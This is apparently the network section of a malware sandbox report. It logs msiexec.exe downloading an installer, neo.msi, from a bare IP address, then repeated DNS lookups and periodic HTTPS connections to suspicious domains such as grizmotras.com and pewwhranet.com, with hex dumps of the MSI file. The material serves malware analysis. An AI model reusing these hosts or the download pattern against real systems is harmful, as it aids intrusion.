Apr 26, 2024 23:25:19.917071104 CEST	443	49854	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:20.179517031 CEST	443	49854	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:20.181906939 CEST	49854	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:20.183482885 CEST	49854	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:20.183484077 CEST	49854	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:20.183530092 CEST	443	49854	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:20.183573961 CEST	443	49854	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:21.158180952 CEST	49854	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:21.179050922 CEST	49855	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:21.179100037 CEST	443	49855	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:21.179157972 CEST	49855	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:21.179394960 CEST	49855	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:21.179410934 CEST	443	49855	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:21.444082975 CEST	443	49855	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:21.444158077 CEST	49855	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:21.444722891 CEST	49855	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:21.444736958 CEST	443	49855	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:21.446484089 CEST	49855	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:21.446495056 CEST	443	49855	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:25.454555035 CEST	49855	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:25.472861052 CEST	49856	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:25.472913980 CEST	443	49856	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:25.472985983 CEST	49856	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:25.473387003 CEST	49856	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:25.473402977 CEST	443	49856	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:25.737504959 CEST	443	49856	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:25.737591028 CEST	49856	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:25.738173008 CEST	49856	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:25.738179922 CEST	443	49856	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:25.740122080 CEST	49856	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:25.740127087 CEST	443	49856	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:29.751338005 CEST	49856	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:29.755162001 CEST	49857	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:29.755198002 CEST	443	49857	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:29.755269051 CEST	49857	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:29.755595922 CEST	49857	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:29.755609035 CEST	443	49857	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:30.022006989 CEST	443	49857	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:30.022063971 CEST	49857	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:30.022619009 CEST	49857	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:30.022644997 CEST	443	49857	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:30.024471045 CEST	49857	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:30.024476051 CEST	443	49857	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:34.033159971 CEST	49857	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:34.037837029 CEST	49858	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:34.037889957 CEST	443	49858	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:34.037955046 CEST	49858	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:34.038222075 CEST	49858	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:34.038237095 CEST	443	49858	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:34.298993111 CEST	443	49858	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:34.299614906 CEST	49858	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:34.303509951 CEST	49858	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:34.303509951 CEST	49858	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:34.303524971 CEST	443	49858	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:34.303549051 CEST	443	49858	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:38.315537930 CEST	49858	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:38.319533110 CEST	49859	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:38.319572926 CEST	443	49859	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:38.323920012 CEST	49859	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:38.323920012 CEST	49859	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:38.323946953 CEST	443	49859	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:38.586808920 CEST	443	49859	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:38.586925030 CEST	49859	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:38.587363958 CEST	49859	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:38.587372065 CEST	443	49859	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:38.591514111 CEST	49859	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:38.591521025 CEST	443	49859	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:42.597593069 CEST	49859	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:42.641664982 CEST	49860	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:42.641705990 CEST	443	49860	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:42.641979933 CEST	49860	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:42.645559072 CEST	49860	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:42.645576954 CEST	443	49860	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:42.903533936 CEST	443	49860	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:42.906141043 CEST	49860	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:42.906141043 CEST	49860	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:42.906171083 CEST	443	49860	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:42.911569118 CEST	49860	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:42.911575079 CEST	443	49860	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:46.924038887 CEST	49860	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:46.944771051 CEST	49861	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:46.944854021 CEST	443	49861	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:46.945190907 CEST	49861	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:46.945190907 CEST	49861	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:46.945261955 CEST	443	49861	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:47.205251932 CEST	443	49861	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:47.205326080 CEST	49861	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:47.205800056 CEST	49861	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:47.205826998 CEST	443	49861	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:47.207334042 CEST	49861	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:47.207349062 CEST	443	49861	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:51.220314980 CEST	49861	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:51.231553078 CEST	49862	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:51.231606960 CEST	443	49862	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:51.231689930 CEST	49862	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:51.232296944 CEST	49862	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:51.232311010 CEST	443	49862	104.21.59.82	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 23:16:38.147034883 CEST	53	62515	1.1.1.1	192.168.2.4
Apr 26, 2024 23:16:38.148977995 CEST	53	59487	1.1.1.1	192.168.2.4
Apr 26, 2024 23:16:38.604731083 CEST	52356	53	192.168.2.4	1.1.1.1
Apr 26, 2024 23:16:38.605351925 CEST	51776	53	192.168.2.4	1.1.1.1
Apr 26, 2024 23:16:38.730247021 CEST	53	52356	1.1.1.1	192.168.2.4
Apr 26, 2024 23:16:38.730752945 CEST	53	51776	1.1.1.1	192.168.2.4
Apr 26, 2024 23:16:40.981214046 CEST	53	64585	1.1.1.1	192.168.2.4
Apr 26, 2024 23:16:53.522897005 CEST	138	138	192.168.2.4	192.168.2.255
Apr 26, 2024 23:17:00.473195076 CEST	53	52881	1.1.1.1	192.168.2.4
Apr 26, 2024 23:17:20.690267086 CEST	53	61709	1.1.1.1	192.168.2.4
Apr 26, 2024 23:17:38.051014900 CEST	53	64174	1.1.1.1	192.168.2.4
Apr 26, 2024 23:17:43.768848896 CEST	53	65329	1.1.1.1	192.168.2.4
Apr 26, 2024 23:18:06.790472984 CEST	53	63197	1.1.1.1	192.168.2.4
Apr 26, 2024 23:18:10.617374897 CEST	57633	53	192.168.2.4	1.1.1.1
Apr 26, 2024 23:18:10.753771067 CEST	53	57633	1.1.1.1	192.168.2.4
Apr 26, 2024 23:18:38.316179037 CEST	57427	53	192.168.2.4	1.1.1.1
Apr 26, 2024 23:18:38.475945950 CEST	53	57427	1.1.1.1	192.168.2.4
Apr 26, 2024 23:18:39.242575884 CEST	138	138	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:39.242714882 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:40.000709057 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:40.766340971 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:42.533425093 CEST	138	138	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:42.533761024 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:43.285227060 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:44.033188105 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:45.797563076 CEST	138	138	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:45.797629118 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:46.547504902 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:47.297702074 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:49.067198992 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:49.829349995 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:50.581366062 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:51.114784002 CEST	53	57247	1.1.1.1	192.168.2.4
Apr 26, 2024 23:18:51.488287926 CEST	138	138	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:51.488359928 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:52.251351118 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:53.001370907 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:54.766266108 CEST	138	138	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:54.766814947 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:55.531770945 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:56.283246040 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:58.063854933 CEST	138	138	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:58.064028025 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:58.815227032 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:18:59.578788996 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:19:01.328990936 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:19:02.094448090 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:19:02.845333099 CEST	137	137	192.168.2.4	192.168.2.255
Apr 26, 2024 23:19:06.064435959 CEST	53499	53	192.168.2.4	1.1.1.1
Apr 26, 2024 23:19:06.198180914 CEST	53	53499	1.1.1.1	192.168.2.4
Apr 26, 2024 23:19:33.783946037 CEST	65267	53	192.168.2.4	1.1.1.1
Apr 26, 2024 23:19:33.971139908 CEST	53	65267	1.1.1.1	192.168.2.4
Apr 26, 2024 23:20:08.799761057 CEST	53	54281	1.1.1.1	192.168.2.4
Apr 26, 2024 23:20:23.783195972 CEST	56983	53	192.168.2.4	1.1.1.1
Apr 26, 2024 23:20:23.909367085 CEST	53	56983	1.1.1.1	192.168.2.4
Apr 26, 2024 23:20:54.165515900 CEST	138	138	192.168.2.4	192.168.2.255
Apr 26, 2024 23:21:15.751749992 CEST	51993	53	192.168.2.4	1.1.1.1
Apr 26, 2024 23:21:15.881078005 CEST	53	51993	1.1.1.1	192.168.2.4
Apr 26, 2024 23:21:35.282795906 CEST	59475	53	192.168.2.4	1.1.1.1
Apr 26, 2024 23:21:35.500755072 CEST	53	59475	1.1.1.1	192.168.2.4
Apr 26, 2024 23:22:29.206254005 CEST	53	51088	1.1.1.1	192.168.2.4
Apr 26, 2024 23:22:44.174295902 CEST	63391	53	192.168.2.4	1.1.1.1
Apr 26, 2024 23:22:44.334362984 CEST	53	63391	1.1.1.1	192.168.2.4
Apr 26, 2024 23:22:57.689495087 CEST	50557	53	192.168.2.4	1.1.1.1
Apr 26, 2024 23:22:57.815968037 CEST	53	50557	1.1.1.1	192.168.2.4
Apr 26, 2024 23:23:45.772629023 CEST	64089	53	192.168.2.4	1.1.1.1
Apr 26, 2024 23:23:45.901792049 CEST	53	64089	1.1.1.1	192.168.2.4
Apr 26, 2024 23:24:39.658442020 CEST	63248	53	192.168.2.4	1.1.1.1
Apr 26, 2024 23:24:39.787820101 CEST	53	63248	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 23:16:38.604731083 CEST	192.168.2.4	1.1.1.1	0x9b7e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:16:38.605351925 CEST	192.168.2.4	1.1.1.1	0x940c	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 26, 2024 23:18:10.617374897 CEST	192.168.2.4	1.1.1.1	0xfec0	Standard query (0)	jarinamaers.shop	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:18:38.316179037 CEST	192.168.2.4	1.1.1.1	0x7144	Standard query (0)	grizmotras.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:19:06.064435959 CEST	192.168.2.4	1.1.1.1	0x1a25	Standard query (0)	grizmotras.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:19:33.783946037 CEST	192.168.2.4	1.1.1.1	0x6ba3	Standard query (0)	grizmotras.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:20:23.783195972 CEST	192.168.2.4	1.1.1.1	0x84e0	Standard query (0)	grizmotras.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:21:15.751749992 CEST	192.168.2.4	1.1.1.1	0x4e1a	Standard query (0)	grizmotras.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:21:35.282795906 CEST	192.168.2.4	1.1.1.1	0xdc3c	Standard query (0)	pewwhranet.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:22:44.174295902 CEST	192.168.2.4	1.1.1.1	0xcd11	Standard query (0)	pewwhranet.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:22:57.689495087 CEST	192.168.2.4	1.1.1.1	0x9f67	Standard query (0)	pewwhranet.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:23:45.772629023 CEST	192.168.2.4	1.1.1.1	0x478	Standard query (0)	grizmotras.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:24:39.658442020 CEST	192.168.2.4	1.1.1.1	0x9fa6	Standard query (0)	grizmotras.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 23:16:38.730247021 CEST	1.1.1.1	192.168.2.4	0x9b7e	No error (0)	www.google.com	142.250.217.228	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:16:38.730752945 CEST	1.1.1.1	192.168.2.4	0x940c	No error (0)	www.google.com		65	IN (0x0001)	false
Apr 26, 2024 23:18:10.753771067 CEST	1.1.1.1	192.168.2.4	0xfec0	No error (0)	jarinamaers.shop	104.21.46.75	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:18:10.753771067 CEST	1.1.1.1	192.168.2.4	0xfec0	No error (0)	jarinamaers.shop	172.67.136.103	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:18:38.475945950 CEST	1.1.1.1	192.168.2.4	0x7144	No error (0)	grizmotras.com	172.67.219.28	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:18:38.475945950 CEST	1.1.1.1	192.168.2.4	0x7144	No error (0)	grizmotras.com	104.21.59.82	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:19:06.198180914 CEST	1.1.1.1	192.168.2.4	0x1a25	No error (0)	grizmotras.com	172.67.219.28	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:19:06.198180914 CEST	1.1.1.1	192.168.2.4	0x1a25	No error (0)	grizmotras.com	104.21.59.82	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:19:33.971139908 CEST	1.1.1.1	192.168.2.4	0x6ba3	No error (0)	grizmotras.com	104.21.59.82	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:19:33.971139908 CEST	1.1.1.1	192.168.2.4	0x6ba3	No error (0)	grizmotras.com	172.67.219.28	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:20:23.909367085 CEST	1.1.1.1	192.168.2.4	0x84e0	No error (0)	grizmotras.com	104.21.59.82	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:20:23.909367085 CEST	1.1.1.1	192.168.2.4	0x84e0	No error (0)	grizmotras.com	172.67.219.28	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:21:15.881078005 CEST	1.1.1.1	192.168.2.4	0x4e1a	No error (0)	grizmotras.com	172.67.219.28	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:21:15.881078005 CEST	1.1.1.1	192.168.2.4	0x4e1a	No error (0)	grizmotras.com	104.21.59.82	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:21:35.500755072 CEST	1.1.1.1	192.168.2.4	0xdc3c	No error (0)	pewwhranet.com	172.67.197.34	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:21:35.500755072 CEST	1.1.1.1	192.168.2.4	0xdc3c	No error (0)	pewwhranet.com	104.21.84.207	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:22:44.334362984 CEST	1.1.1.1	192.168.2.4	0xcd11	No error (0)	pewwhranet.com	172.67.197.34	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:22:44.334362984 CEST	1.1.1.1	192.168.2.4	0xcd11	No error (0)	pewwhranet.com	104.21.84.207	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:22:57.815968037 CEST	1.1.1.1	192.168.2.4	0x9f67	No error (0)	pewwhranet.com	104.21.84.207	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:22:57.815968037 CEST	1.1.1.1	192.168.2.4	0x9f67	No error (0)	pewwhranet.com	172.67.197.34	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:23:45.901792049 CEST	1.1.1.1	192.168.2.4	0x478	No error (0)	grizmotras.com	104.21.59.82	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:23:45.901792049 CEST	1.1.1.1	192.168.2.4	0x478	No error (0)	grizmotras.com	172.67.219.28	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:24:39.787820101 CEST	1.1.1.1	192.168.2.4	0x9fa6	No error (0)	grizmotras.com	172.67.219.28	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:24:39.787820101 CEST	1.1.1.1	192.168.2.4	0x9fa6	No error (0)	grizmotras.com	104.21.59.82	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.google.com

slscr.update.microsoft.com

fs.microsoft.com

jarinamaers.shop

grizmotras.com

self.events.data.microsoft.com

pewwhranet.com

146.19.106.236

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	146.19.106.236	80	7572	C:\Windows\System32\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 23:16:30.134435892 CEST	115	OUT	GET /neo.msi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows Installer Host: 146.19.106.236
Apr 26, 2024 23:16:30.306111097 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:16:30 GMT Server: Apache/2.4.6 (CentOS) Last-Modified: Fri, 26 Apr 2024 15:51:00 GMT ETag: "18ba00-61701dec32100" Accept-Ranges: bytes Content-Length: 1620480 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 03 00 00 00 05 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 45 00 00 00 cf 00 00 00 61 01 00 00 d3 01 00 00 d4 01 00 00 d5 01 00 00 d6 01 00 00 d7 01 00 00 d8 01 00 00 e6 04 00 00 28 05 00 00 29 05 00 00 2a 05 00 00 2b 05 00 00 2c 05 00 00 2d 05 00 00 2e 05 00 00 08 00 00 00 41 09 00 00 42 09 00 00 43 09 00 00 44 09 00 00 45 09 00 00 46 09 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [TRUNCATED] Data Ascii: >Ea()+,-.ABCDEF;!3 +"#$%&'()1,-./042:?56789><=@ABCDGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|} [TRUNCATED]
Apr 26, 2024 23:16:30.306157112 CEST	1289	IN	Data Raw: 00 52 00 6f 00 6f 00 74 00 20 00 45 00 6e 00 74 00 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 05 00 ff ff ff ff ff ff ff ff 0e 00 00 00 84 Data Ascii: Root EntryFFSummaryInformation(
Apr 26, 2024 23:16:30.306197882 CEST	1289	IN	Data Raw: 43 00 00 00 44 00 00 00 45 00 00 00 46 00 00 00 47 00 00 00 48 00 00 00 49 00 00 00 4a 00 00 00 4b 00 00 00 4c 00 00 00 4d 00 00 00 4e 00 00 00 4f 00 00 00 50 00 00 00 51 00 00 00 52 00 00 00 53 00 00 00 54 00 00 00 55 00 00 00 56 00 00 00 57 00 Data Ascii: CDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`adfghijklmnopwrstuvxyz{\|}~
Apr 26, 2024 23:16:30.306257010 CEST	1289	IN	Data Raw: 9d 02 95 26 ad 02 85 26 ad 48 ad 20 ad 20 ad 04 8d 04 91 04 91 ff 9d 02 95 20 9d ff 9d ff 9d 48 ad 00 9d 02 95 48 ad 00 9d 00 9d 48 ad 00 9d 02 95 48 ad 20 8d 02 85 04 91 02 95 48 ad 00 89 48 ad 48 8d ff 8f 04 81 48 9d 14 9d 02 95 04 81 48 ad 26 Data Ascii: &&H HHHH HHHHH&HHH@ HH222H222H&&@HHHH222HH22H22HHHHH
Apr 26, 2024 23:16:30.306294918 CEST	1289	IN	Data Raw: ff ff 48 09 00 00 49 09 00 00 4a 09 00 00 4b 09 00 00 4c 09 00 00 4d 09 00 00 4e 09 00 00 4f 09 00 00 50 09 00 00 51 09 00 00 52 09 00 00 53 09 00 00 54 09 00 00 55 09 00 00 56 09 00 00 57 09 00 00 58 09 00 00 59 09 00 00 5a 09 00 00 5b 09 00 00 Data Ascii: HIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~AttributesPat
Apr 26, 2024 23:16:30.306334972 CEST	1289	IN	Data Raw: 69 74 73 20 28 31 2f 31 32 20 6f 66 20 74 68 65 20 73 79 73 74 65 6d 20 66 6f 6e 74 20 68 65 69 67 68 74 29 2e 20 41 73 73 75 6d 69 6e 67 20 74 68 61 74 20 74 68 65 20 73 79 73 74 65 6d 20 66 6f 6e 74 20 69 73 20 73 65 74 20 74 6f 20 31 32 20 70 Data Ascii: its (1/12 of the system font height). Assuming that the system font is set to 12 point size, this is equivalent to the point size.Description of columnPrimary key, non-localized token, foreign key to File table, must match identifier in cabine
Apr 26, 2024 23:16:30.306375980 CEST	1289	IN	Data Raw: 67 6c 65 20 6f 66 20 74 68 65 20 63 6f 6e 74 72 6f 6c 2e 43 6f 6e 74 72 6f 6c 5f 46 69 72 73 74 44 65 66 69 6e 65 73 20 74 68 65 20 63 6f 6e 74 72 6f 6c 20 74 68 61 74 20 68 61 73 20 74 68 65 20 66 6f 63 75 73 20 77 68 65 6e 20 74 68 65 20 64 69 Data Ascii: gle of the control.Control_FirstDefines the control that has the focus when the dialog is created.ErrorMessageTemplateError formatting template, obtained from user ed. or localizers.FeatureDirectory_DirectoryUpperCaseThe name of the Directory
Apr 26, 2024 23:16:30.306435108 CEST	1289	IN	Data Raw: 65 6e 2c 20 42 6c 75 65 20 65 61 63 68 20 30 2d 32 35 35 2c 20 52 47 42 20 3d 20 52 20 2b 20 32 35 36 2a 47 20 2b 20 32 35 36 5e 32 2a 42 29 2e 52 65 71 75 69 72 65 64 20 6b 65 79 20 6f 66 20 61 20 44 69 72 65 63 74 6f 72 79 20 74 61 62 6c 65 20 Data Ascii: en, Blue each 0-255, RGB = R + 256G + 256^2B).Required key of a Directory table record. This is actually a property name whose value contains the actual path, set either by the AppSearch action or with the default setting obtained from the D
Apr 26, 2024 23:16:30.306473970 CEST	1289	IN	Data Raw: 77 69 74 68 69 6e 20 61 20 63 6f 6e 74 72 6f 6c 20 28 69 66 20 61 70 70 72 6f 70 72 69 61 74 65 29 2e 43 6f 6e 74 72 6f 6c 5f 4e 65 78 74 54 68 65 20 6e 61 6d 65 20 6f 66 20 61 6e 20 6f 74 68 65 72 20 63 6f 6e 74 72 6f 6c 20 6f 6e 20 74 68 65 20 Data Ascii: within a control (if appropriate).Control_NextThe name of an other control on the same dialog. This link defines the tab order of the controls. The links have to form one or more cycles!HelpThe help strings used with the button. The text is op
Apr 26, 2024 23:16:30.306510925 CEST	1289	IN	Data Raw: 20 74 79 70 65 2c 20 63 6f 6e 73 69 73 74 69 6e 67 20 6f 66 20 73 6f 75 72 63 65 20 6c 6f 63 61 74 69 6f 6e 2c 20 63 6f 64 65 20 74 79 70 65 2c 20 65 6e 74 72 79 2c 20 6f 70 74 69 6f 6e 20 66 6c 61 67 73 2e 53 6f 75 72 63 65 43 75 73 74 6f 6d 53 Data Ascii: type, consisting of source location, code type, entry, option flags.SourceCustomSourceThe table reference of the source of the code.TargetExcecution parameter, depends on the type of custom actionExtendedTypeThe numeric custom action type inf
Apr 26, 2024 23:16:30.477952957 CEST	1289	IN	Data Raw: 65 64 20 74 6f 20 69 74 73 65 6c 66 20 6f 72 20 77 69 74 68 20 61 20 4e 75 6c 6c 20 70 61 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 73 20 61 20 72 6f 6f 74 20 6f 66 20 74 68 65 20 69 6e 73 74 61 6c 6c 20 74 72 65 65 2e 44 65 66 61 75 6c 74 44 69 Data Ascii: ed to itself or with a Null parent represents a root of the install tree.DefaultDirThe default sub-path under parent's path.Integer error number, obtained from header file IError(...) macros.A foreign key to the Dialog table, name of the Dialo

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	142.250.217.228	443	7244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
